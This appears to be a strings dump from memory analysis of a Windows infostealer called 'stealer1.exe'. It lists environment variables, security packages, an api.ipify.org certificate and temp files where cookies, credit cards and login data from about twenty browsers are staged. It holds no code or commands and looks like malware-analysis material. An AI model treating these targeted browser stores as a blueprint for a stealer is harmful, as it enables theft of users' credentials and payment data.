0x360f2f (21): v1.3.6.1.4.1.311.10.1
0x360f67 (19): v1.2.840.113549.3.2
0x360f9f (22): v1.2.840.113549.1.9.15
0x360fd7 (18): v1.3.6.1.5.5.7.1.3
0x36100f (21): v1.2.840.113549.1.9.5
0x361047 (23): v1.3.6.1.4.1.311.13.2.1
0x36107f (23): v1.3.6.1.4.1.311.13.2.2
0x3610b7 (23): v1.3.6.1.4.1.311.10.9.1
0x3610ef (21): v1.3.6.1.4.1.311.21.7
0x361127 (21): v1.3.6.1.5.5.7.48.1.1
0x36115f (19): v1.3.6.1.5.5.7.1.12
0x361197 (18): v1.3.6.1.5.5.7.1.2
0x3611cf (18): v1.2.840.10045.4.3
0x36139f (9): v2.5.29.8
0x3613cf (10): v2.5.29.10
0x3613ff (10): v2.5.29.15
0x36142f (10): v2.5.29.19
0x36145f (10): v2.5.29.32
0x36148f (9): v2.5.29.3
0x3614bf (10): v2.5.29.35
0x3614ef (10): v2.5.29.14
0x36151f (10): v2.5.29.17
0x36154f (10): v2.5.29.18
0x36157f (10): v2.5.29.21
0x3615af (10): v2.5.29.31
0x3615df (10): v2.5.29.37
0x36160f (10): v2.5.29.20
0x36163f (10): v2.5.29.27
0x36166f (10): v2.5.29.28
0x36169f (10): v2.5.29.46
0x3616cf (10): v2.5.29.30
0x3616ff (10): v2.5.29.33
0x36172f (9): v2.5.29.5
0x36175f (10): v2.5.29.36
0x36178f (10): v2.5.29.54
0x36181f (13): v1.3.14.3.2.7
0x36184f (13): v1.3.14.3.2.7
0x361b87 (26): v2.16.840.1.113733.1.7.1.1
0x361bc7 (25): v1.3.6.1.4.1.311.10.11.85
0x361c1f (18): v1.2.840.10045.2.1
0x361c57 (22): v1.2.840.113549.1.1.10
0x361c8f (21): v1.2.840.113549.1.1.7
0x361cff (19): v1.2.840.113549.3.7
0x361d37 (19): v1.2.840.113549.3.2
0x361d6f (19): v1.2.840.113549.3.4
0x361da7 (21): v1.2.840.113549.1.1.1
0x361ddf (19): v1.2.840.113549.3.7
0x361e17 (19): v1.2.840.113549.3.2
0x361e4f (19): v1.2.840.113549.3.4
0x361ec8 (10): USERNAME=A
0x361f50 (36): C:\Users\A\Desktop
0x361ff8 (40): C:\Users\A\Documents
0x3620a0 (44): C:\Program Files (x86)
0x3621f0 (44): Microsoft Unified Security Protocol Provider
0x362228 (44): PKU2U Security Package
0x362298 (46): LRPC-710cd034e2444564be
0x3622d0 (46): Microsoft Kerberos V1.0
0x362308 (42): NTLM Security Package
0x362418 (35): CertDllVerifyCertificateChainPolicy
0x362470 (34): CryptMsgDllCNGGenContentEncryptKey
0x3624c8 (37): CryptMsgDllCNGImportContentEncryptKey
0x362a0d (6): r,t8*6
0x362a34 (7):  r,t`*6
0x362afd (6): r,t(+6
0x362b25 (6): r,tP+6
0x362b4d (6): r,tx+6
0x362c14 (7): @s,th,6
0x362c38 (31): C:\Users\A\Desktop\stealer1.exe
0x362df0 (222): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\
0x362ed8 (246): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
0x363008 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
0x363130 (15): Winsta0\Default
0x363190 (14): AppData
0x3631a8 (14): Desktop
0x3631c0 (14): Desktop
0x3640ee (26): =C:\Program F
0x3641aa (26):
0x364228 (24):
0x364241 (8):
0x36428a (26): abcdefghijklmnopqrstuvwxyz
0x3642aa (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
0x364388 (31): C:\Users\A\Desktop\stealer1.exe
0x3643d8 (14): COMPUTERNAME=O
0x3643f8 (104): C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
0x365ad8 (30): AppData\Roaming
0x365b00 (26): Local AppData
0x365b28 (26): AppData\Local
0x365b50 (24): ProgramFiles
0x365b78 (30): ProgramFilesX86
0x365de0 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x365e48 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x365eb0 (48): CommonProgramW6432=C:\Program Files\Common Files
0x365f10 (19): FP_NO_HOST_CHECK=NO
0x365f50 (12): HOMEDRIVE=C:
0x365f90 (17): HOMEPATH=\Users\A
0x365fd0 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x366028 (15): LOGONSERVER=\\O
0x366068 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x3660e0 (36): MpConfig_ProductCodeName=AntiSpyware
0x366138 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x3661a0 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x366208 (13): OS=Windows_NT
0x366248 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x366318 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x366388 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x366400 (17): PROCESSOR_LEVEL=6
0x366440 (40): ProgramFiles(x86)=C:\Program Files (x86)
0x366498 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x366508 (19): SESSIONNAME=Console
0x366548 (14): SystemDrive=C:
0x366588 (12): USERDOMAIN=O
0x3665c8 (17): windir=C:\Windows
0x366608 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x366ea2 (106): 6\Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
0x3675d0 (82): @%SystemRoot%\system32\shell32.dll,-21769
0x367630 (78): %SystemRoot%\system32\imageres.dll,-183
0x3676a8 (16): Personal
0x3676c8 (18): Documents
0x3676e8 (158): ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
0x367790 (82): @%SystemRoot%\system32\shell32.dll,-21770
0x3677f0 (78): %SystemRoot%\system32\imageres.dll,-112
0x3678e0 (14): COMPUTERNAME=O
0x3679a0 (13): OS=Windows_NT
0x3679e0 (17): PROCESSOR_LEVEL=6
0x367a20 (19): SESSIONNAME=Console
0x367b60 (17): HOMEPATH=\Users\A
0x367be0 (12): USERDOMAIN=O
0x367c20 (12): HOMEDRIVE=C:
0x367d00 (50): Schannel Security Package
0x367d40 (50): Schannel Security Package
0x367e20 (15): LOGONSERVER=\\O
0x367ee0 (19): FP_NO_HOST_CHECK=NO
0x367f80 (54): TS Service Security Package
0x367fe0 (14): SystemDrive=C:
0x368660 (17): windir=C:\Windows
0x368868 (82): @%SystemRoot%\system32\shell32.dll,-21781
0x3688e8 (82): @%SystemRoot%\system32\shell32.dll,-21817
0x368dc0 (38): C:\Windows\rescache
0x368ee0 (34): protected_storage
0x368fd0 (33): Digest Authentication for Windows
0x3690a2 (14): 6GSSAPI
0x3698b4 (20): sr-Latn-CS
0x369906 (16): qps-ploc
0x369918 (18): qps-plocm
0x36995c (16): 52C64B7E
0x36a216 (30): 	tzres.dll,-212
0x36a256 (42): Pacific Standard Time
0x36a296 (30): @tzres.dll,-211
0x36a2d6 (42): Pacific Daylight Time
0x36a3f8 (38): C:\Users\A\AppData\Local\Temp\body.out
0x36a7b8 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
0x36a9e0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
0x36ac08 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
0x36ae30 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
0x36b058 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
0x36b280 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
0x36b4a8 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
0x36b6d0 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
0x36b8f8 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
0x36bb20 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
0x36bd48 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
0x36bf70 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
0x36c198 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
0x36c3c0 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
0x36c5e8 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
0x36c810 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
0x36ca38 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
0x36cc60 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
0x36ce88 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
0x36d0b0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
0x36d2d8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
0x36d500 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
0x36d728 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
0x36d950 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
0x36db78 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
0x36dda0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
0x36dfc8 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
0x36e1f0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
0x36e418 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
0x36e9ae (54): 9ppData\Local\Google\Chrome
0x36ed20 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x36ed88 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x36ee38 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
0x36ef28 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
0x36fe06 (78): 8sers\A\AppData\Local\Temp\MSVCP140.dll
0x36fe56 (24): MSVCP140.dll
0x36fe70 (26): \MSVCP140.dll
0x36fef0 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x3707c0 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
0x3709e8 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
0x370c10 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
0x370e38 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
0x371060 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
0x371288 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
0x3714b0 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
0x3716d8 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
0x371900 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
0x371b28 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
0x371d50 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
0x371f78 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
0x3721a0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
0x3723c8 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
0x3725f0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
0x372818 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
0x372a40 (42): C:\Users\A\AppData\Local\Temp\Opera_CC.txt
0x372c68 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
0x372e90 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
0x3730b8 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
0x3732e0 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
0x373508 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
0x373730 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
0x373958 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
0x373b80 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
0x373da8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
0x373fd0 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
0x3741f8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
0x374420 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
0x3747c0 (45): C:\Users\A\AppData\Local\Temp\Maxthon5_CC.txt
0x3749e8 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
0x374c10 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
0x374e38 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
0x375060 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
0x375288 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
0x3754b0 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
0x3756d8 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
0x375900 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
0x375b28 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
0x375d50 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
0x375f78 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
0x3761a0 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
0x3763c8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
0x3765f0 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
0x376818 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
0x376a40 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
0x376c68 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
0x376e90 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
0x3770b8 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
0x3772e0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
0x3774f4 (514): C:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
0x37a868 (48): CommonProgramW6432=C:\Program Files\Common Files
0x37a8a8 (82): C:\Users\A\AppData\Local\Temp\mozglue.dll
0x37cf14 (30): dows\system32\_
0x37d068 (7): WDigest
0x37d6a0 (11): cryptsp.dll
0x37d730 (12): NegoExtender
0x37d760 (9): Negotiate
0x37d778 (14): ncalrpc
0x37d790 (8): Kerberos
0x37d7c0 (8): Schannel
0x37d7d8 (14): WDigest
0x37d850 (14): CREDSSP
0x37da20 (22): DNSResolver
0x37da80 (16): epmapper
0x37daa0 (17): SystemFunction035
0x37dae0 (20): lsasspirpc
0x37db00 (20): lsasspirpc
0x37db20 (18): Negotiate
0x37db40 (16): Kerberos
0x37db60 (23): Microsoft Kerberos V1.0
0x37db80 (21): NTLM Security Package
0x37dba0 (16): Schannel
0x37dbc0 (22): PKU2U Security Package
0x37dc20 (20): rogin Data
0x37e570 (28): Microsoft Package Negotiator
0x37e8b8 (24): NegoExtender
0x37e8e0 (29): NegoExtender Security Package
0x37e908 (25): Schannel Security Package
0x37e958 (25): Schannel Security Package
0x37e9d0 (27): TS Service Security Package
0x37e9fa (18): DVAPI32.d
0x37f268 (88): Microsoft Unified Security Protocol Provider
0x37f6bc (26): api.ipify.org
0x37f7b8 (21): COMODO CA Limited1604
0x37f7d3 (47): -COMODO RSA Domain Validation Secure Server CA0
0x37f804 (14):
180124000000Z
0x37f813 (19):
210123235959Z0X1!0
0x37f82e (25): Domain Control Validated1
0x37f851 (21): PositiveSSL Wildcard1
0x37f870 (12): *.ipify.org0
0x37fa50 (30): https://secure.comodo.com/CPS0
0x37fa89 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
0x37faeb (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
0x37fb3d (26): http://ocsp.comodoca.com0!
0x37fb62 (11): *.ipify.org
0x37fb6e (12): 	ipify.org0

0x382fe8 (20): %pi.ipify.
0x383d0c (23): LRPC-710cd034e2444564be
0x385a30 (64): C:\Windows\SysWOW64\negoexts.DLL
0x385a80 (64): C:\Windows\SysWOW64\Kerberos.DLL
0x385ad0 (64): C:\Windows\SysWOW64\schannel.dll
0x385b20 (66): Digest Authentication for Windows
0x385b70 (62): C:\Windows\SysWOW64\wdigest.dll
0x385bc0 (70): Microsoft CredSSP Security Provider
0x385c10 (64): C:\Windows\SysWOW64\schannel.dll
0x385c80 (34): TEMP=C:\Users\A\AppData\Local\Temp
0x385cd0 (33): TMP=C:\Users\A\AppData\Local\Temp
0x387384 (22): cryptsp.dll
0x388c60 (32): @@HHPPXX``hhppxx
0x388d4e (50): 8  ((0088@@HHPPXX``hhppxx
0x388e4e (50): 8  ((0088@@HHPPXX``hhppxx
0x388f4e (50): 8  ((0088@@HHPPXX``hhppxx
0x38904e (50): 8  ((0088@@HHPPXX``hhppxx
0x38914e (50): 8  ((0088@@HHPPXX``hhppxx
0x38924e (50): 8  ((0088@@HHPPXX``hhppxx
0x38934e (50): 8  ((0088@@HHPPXX``hhppxx
0x38942e (20): 8  ((0088K
0x38a51e (42): 8bcryptprimitives.dll
0x38a552 (7): dationY
0x38a7f1 (48): Chttp://crl.comodoca.com/COMODORSADomainValidatA
0x38a828 (80): C:\Windows\SysWOW64\bcryptprimitives.dll
0x38a87a (7): nValid;
0x38a8cc (9): ipify.org
0x38a8d6 (12): 	ipify.org0

0x38aa40 (19): Greater Manchester1
0x38aa5d (8): Salford1
0x38aa8c (34): OMODO RSA Certification Authority0
0x38aab0 (14):
140212000000Z
0x38aabf (15):
290211235959Z0
0x38ab05 (8): Salford1
0x38ab17 (21): COMODO CA Limited1604
0x38ab32 (26): -COMODO RSA Domain Validat
0x38ace8 (40): bcryptprimitives.dll
0x38ade0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
0x38aff8 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x38b178 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
0x38b4d4 (20): ncrypt.dll
0x38b9b0 (10): USERNAME=A
0x38c8a8 (14): =::=::\
0x38c8b8 (60): ALLUSERSPROFILE=C:\ProgramData
0x38c8f6 (68): APPDATA=C:\Users\A\AppData\Roaming
0x38c93c (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x38c9aa (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x38ca22 (96): CommonProgramW6432=C:\Program Files\Common Files
0x38ca84 (28): COMPUTERNAME=O
0x38caa2 (70): ComSpec=C:\Windows\system32\cmd.exe
0x38caea (38): FP_NO_HOST_CHECK=NO
0x38cb12 (24): HOMEDRIVE=C:
0x38cb2c (34): HOMEPATH=\Users\A
0x38cb50 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
0x38cb9c (30): LOGONSERVER=\\O
0x38cbbc (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x38cc48 (72): MpConfig_ProductCodeName=AntiSpyware
0x38cc92 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x38cd00 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x38cda8 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x38ce20 (44): NUMBER_OF_PROCESSORS=4
0x38ce4e (26): OS=Windows_NT
0x38ce6a (384): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
0x38cfec (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x38d068 (52): PROCESSOR_ARCHITECTURE=x86
0x38d09e (56): PROCESSOR_ARCHITEW6432=AMD64
0x38d0d8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x38d16a (34): PROCESSOR_LEVEL=6
0x38d18e (46): PROCESSOR_REVISION=9e09
0x38d1be (52): ProgramData=C:\ProgramData
0x38d1f4 (70): ProgramFiles=C:\Program Files (x86)
0x38d23c (80): ProgramFiles(x86)=C:\Program Files (x86)
0x38d28e (58): ProgramW6432=C:\Program Files
0x38d2ca (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x38d34c (44): PUBLIC=C:\Users\Public
0x38d37a (38): SESSIONNAME=Console
0x38d3a2 (28): SystemDrive=C:
0x38d3c0 (42): SystemRoot=C:\Windows
0x38d3ec (68): TEMP=C:\Users\A\AppData\Local\Temp
0x38d432 (66): TMP=C:\Users\A\AppData\Local\Temp
0x38d476 (24): USERDOMAIN=O
0x38d490 (20): USERNAME=A
0x38d4a6 (44): USERPROFILE=C:\Users\A
0x38d4d4 (34): windir=C:\Windows
0x38d4f8 (46): windows_tracing_flags=3
0x38d528 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x38d5c8 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
0x38d61e (24): MSVCP140.dll
0x38d638 (26): \MSVCP140.dll
0x38d978 (62): Microsoft SSL Protocol Provider
0x38de0e (6): H+HU 9
0x38df26 (19): Greater Manchester1
0x38df43 (8): Salford1
0x38df55 (21): COMODO CA Limited1604
0x38df70 (47): -COMODO RSA Domain Validation Secure Server CA0
0x38dfa1 (14):
180124000000Z
0x38dfb0 (19):
210123235959Z0X1!0
0x38dfcb (25): Domain Control Validated1
0x38dfee (21): PositiveSSL Wildcard1
0x38e00d (12): *.ipify.org0
0x38e1ed (30): https://secure.comodo.com/CPS0
0x38e226 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
0x38e288 (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
0x38e2da (26): http://ocsp.comodoca.com0!
0x38e2ff (11): *.ipify.org
0x38e30b (12): 	ipify.org0

0x38e476 (19): Greater Manchester1
0x38e493 (8): Salford1
0x38e4a5 (21): COMODO CA Limited1+0)
0x38e4c0 (36): "COMODO RSA Certification Authority0
0x38e4e6 (14):
140212000000Z
0x38e4f5 (15):
290211235959Z0
0x38e51e (19): Greater Manchester1
0x38e53b (8): Salford1
0x38e54d (21): COMODO CA Limited1604
0x38e568 (47): -COMODO RSA Domain Validation Secure Server CA0
0x38e776 (62): ;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
0x38e7cf (50): /http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
0x38e80d (26): http://ocsp.comodoca.com0

0x38e8ca (6): f5s2`N
0x390b4c (32): tem32\bcrypt.dll
0x390ff0 (40): bcryptprimitives.dll
0x391028 (62): Microsoft SSL Protocol Provider
0x391120 (26): PROCESSOR_ARCHITECTURE=x86
0x391168 (21): SystemRoot=C:\Windows
0x391288 (23): PROCESSOR_REVISION=9e09
0x3912f8 (62): C:\Windows\system32\dbghelp.dll
0x391558 (22): PUBLIC=C:\Users\Public
0x3915a0 (26): ProgramData=C:\ProgramData
0x3915e8 (23): windows_tracing_flags=3
0x391630 (22): USERPROFILE=C:\Users\A
0x391870 (22): NUMBER_OF_PROCESSORS=4
0x394083 (6): +][!>G
0x3942ba (7): L#K~Dl

0x3970a8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
0x3972c0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
0x3974d8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
0x3976d6 (368): 6rogram Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
0x3978b0 (112): C:\Users\A\AppData\Local\Google\Chrome\USERDA~1\Default\
0x3ce298 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x3ce2f0 (36): MpConfig_ProductCodeName=AntiSpyware
0x3ce348 (40): ProgramFiles(x86)=C:\Program Files (x86)
0x3ce3a0 (38): C:\Users\A\AppData\Local\Temp\nss3.dll
0x3ce3d8 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
0x3ce430 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
0x3cfa80 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
0x3cfd18 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x3cfd90 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x3cfe08 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x3d0d00 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
0x3d0f18 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x3d13e8 (6): zxGj`P
0x3d17d0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
0x3d19e8 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
0x3d1c00 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
0x3d1e18 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
0x3d2030 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
0x3d2248 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x3d3b08 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
0x3d4550 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
0x3d4778 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
0x3d49a0 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
0x3d4bc8 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
0x3d4df0 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
0x3d5018 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
0x3d5240 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
0x3d5468 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
0x3d5690 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
0x3d58b8 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
0x3d5ae0 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
0x3d5d08 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
0x3d5f30 (39): C:\Users\A\AppData\Local\Temp\Opera.txt
0x3d6158 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
0x3d6380 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
0x3d65a8 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
0x3d67d0 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
0x3d69f8 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
0x3d6c20 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
0x3d6e48 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
0x3d7070 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
0x3d7298 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
0x3d74c0 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
0x3d76e8 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
0x3d7910 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
0x3d7b38 (42): C:\Users\A\AppData\Local\Temp\Maxthon5.txt
0x3d7d60 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
0x3d7f88 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
0x3d81b0 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
0x3d8550 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
0x3d8778 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
0x3d89a0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
0x3d8bc8 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
0x3d8df0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
0x3d9018 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
0x3d9240 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
0x3d9468 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
0x3d9690 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
0x3d98b8 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
0x3d9ae0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
0x3d9d08 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
0x3d9f30 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
